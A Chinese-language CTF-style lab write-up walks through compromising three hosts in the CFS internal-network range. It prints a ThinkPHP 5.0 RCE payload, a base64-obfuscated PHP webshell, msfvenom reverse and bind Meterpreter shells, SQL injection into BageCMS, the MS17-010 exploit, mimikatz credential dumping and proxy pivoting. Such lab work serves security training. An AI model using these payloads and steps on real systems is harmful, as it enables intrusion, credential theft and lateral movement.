CFS三层靶机渗透记录

0x00 前言

这是 TeamsSix前辈出的一个三层内网渗透的靶场,偏向于CTF,但更类似于真实的渗透环境。通过一层一层的渗透,获取每个靶机的flag。

0x01 环境搭建

靶场获取:https://pan.baidu.com/s/1m3JoNfyxE-a96o7DMb1eLw 提取码:ht9o

靶场环境网络拓扑图:
CFS三层靶机渗透记录_第1张图片
导入虚拟机后,根据拓扑图进行网络配置或者自己设置。

targe1:172.12.200.153 192.168.22.128
targe2:192.168.22.129 192.168.33.128
targe3:192.168.33.129

0x02 target1

1、信息收集

首先简单的信息收集来一波,发现存在ThinkPHP-V5.0-RCE 远程代码执行漏洞。
端口服务:21、22、80、111、888、3306、8888
CFS三层靶机渗透记录_第2张图片
目录文件:
http://172.16.200.153/robots.txt(发现第一个flag)

CFS三层靶机渗透记录_第3张图片
http://172.16.200.153/index.php(ThinkPHP-V5.0-RCE-远程代码执行漏洞)CFS三层靶机渗透记录_第4张图片

2、漏洞利用–Getshell:

确定漏洞是否存在payload:

http://172.16.200.153/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=

CFS三层靶机渗透记录_第5张图片
确定存在后开始写shell:
在这里插入图片描述
貌似被过滤了,后面用nc反弹的方法又写了一遍发现过滤了post
CFS三层靶机渗透记录_第6张图片
使用base64绕过试试:
CFS三层靶机渗透记录_第7张图片

payload:echo " PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg=="|base64 -d > a.php

CFS三层靶机渗透记录_第8张图片
CFS三层靶机渗透记录_第9张图片
成功写入后,使用工具连接一下小马儿,刚好发现了第二flag。
CFS三层靶机渗透记录_第10张图片
发现第三个flag:
CFS三层靶机渗透记录_第11张图片

3、边界机信息收集:

边界机信息收集:IP段 -->IP段主机存活 -->存活IP端口服务、敏感信息、帐号密码
系统版本信息:
在这里插入图片描述
由于172.16.200.0段是我自己的,所以主要探测192.168.22.0段的IP存活:
CFS三层靶机渗透记录_第12张图片
这里可以使用脚本进行探测,但考虑到后面的渗透。我感觉还是使用MSF比较方便。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=172.16.200.139 lport=12345 -f elf -o 153.elf

使用msfvenom生成payload,之后上传到被控制服务器,给权限后执行获取session。
CFS三层靶机渗透记录_第13张图片
接下来探测192.168.22.0段的IP存活、端口服务,不过探测主机存活和端口前需要添加内网路由:
CFS三层靶机渗透记录_第14张图片

接下来使用auxiliary/scanner/portscan/tcp 探测主机存活:
CFS三层靶机渗透记录_第15张图片
结果扫描出192.168.22.128、192.168.22.129,其中128是本机,接下来扫描192.168.22.129的端口:
CFS三层靶机渗透记录_第16张图片
继续使用该模块扫描端口:
CFS三层靶机渗透记录_第17张图片
可以发现主机开放了21、22、80、888、3306、5555、8888端口,当然我们是也可以使用nmap进行扫描,不过扫描之前,需要使用auxiliary/server/socks4a模块,然后配置一下proxychain 代理:
CFS三层靶机渗透记录_第18张图片

Vi /etc/proxychains.conf

CFS三层靶机渗透记录_第19张图片接下来就可以使用nmap 进行端口服务扫描了
Proxychains nmap -Pn -sT 192.168.22.129
CFS三层靶机渗透记录_第20张图片

0x03 target2

1、漏洞利用–Getshell

通过对内网129主机进行端口服务,目录等进行信息收集后,发现这里存在一个bagecms 3.1的内容管理系统,该版本存在多个高危漏洞。
CFS三层靶机渗透记录_第21张图片
CFS三层靶机渗透记录_第22张图片CFS三层靶机渗透记录_第23张图片
找到一个提示点:
CFS三层靶机渗透记录_第24张图片
既然存在注入漏洞,那么就从注入漏洞下手,获取帐号密码,然后直接getshell.
CFS三层靶机渗透记录_第25张图片
获取帐号密码后,进入后台:
CFS三层靶机渗透记录_第26张图片
在模版中写入一句话木马,然后连接小马儿:

CFS三层靶机渗透记录_第27张图片CFS三层靶机渗透记录_第28张图片
连接之前需要配置Proxifiler代理:
CFS三层靶机渗透记录_第29张图片
成功连接小马儿,并找到第二个flag。
CFS三层靶机渗透记录_第30张图片

2、边界机信息收集

接下来继续收集该主机的IP网段,端口服务。但是在这之前,需要先获取一个正向连接msf的shell。

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=54321 -f elf > 129.elf

在这里插入图片描述
然后上传木马,给权限执行,获取shell,当然这里需要使用代理重启一个msf。

CFS三层靶机渗透记录_第31张图片

加上前面两个,共有6个flag:
CFS三层靶机渗透记录_第32张图片
CFS三层靶机渗透记录_第33张图片在这里插入图片描述在这里插入图片描述
接下来添加路由,设置代理,继续搞内网。由于192.168.22.0段我们已经搞过了,这里需要探测的是192.168.33.0段。
CFS三层靶机渗透记录_第34张图片
使用之前的模块扫描IP存活和端口:

auxiliary/scanner/portscan/tcp

CFS三层靶机渗透记录_第35张图片
扫描后发现一个存活IP:192.168.33.129,还开放了445、3389,可能存在永恒之蓝。CFS三层靶机渗透记录_第36张图片

0x04 target3

1、漏洞利用-MS17-010

使用了MSF的模块对它进行探测看看是否存在永恒之蓝。

auxiliary/scanner/smb/smb_ms17_010

CFS三层靶机渗透记录_第37张图片

确定存在后,使用下面的攻击模块进行攻击。

exploit/windows/smb/ms17_010_psexe

CFS三层靶机渗透记录_第38张图片

2、提权

提权–> 获取帐号密码
CFS三层靶机渗透记录_第39张图片
使用msf 自带的 mimikatz 获取帐号密码:
在这里插入图片描述
因为端口探测时已经知道3389是开放的了,这里直接把3389转发出来:
在这里插入图片描述
这里需要使用代理连接:

proxychains rdesktop 127.0.0.1:3389

在这里插入图片描述
输入帐号密码进入系统找flag,共有4个。如下图:
CFS三层靶机渗透记录_第40张图片
CFS三层靶机渗透记录_第41张图片CFS三层靶机渗透记录_第42张图片CFS三层靶机渗透记录_第43张图片

0x05 总结

利用点:

  • ThinkPHP-V5.0-RCE 远程代码执行漏洞
  • bagecms 3.1 sql注入漏洞、后台getshell
  • ms17-010 漏洞

技术点:

  • 使用编码绕过防护写入小马
  • Msfvenonm生成木马
  • MSF基本用法
  • MSF-路由转发和代理配置
  • MSF的内网主机探测
  • MSF常用攻击模块使用等

你可能感兴趣的:(靶场记录)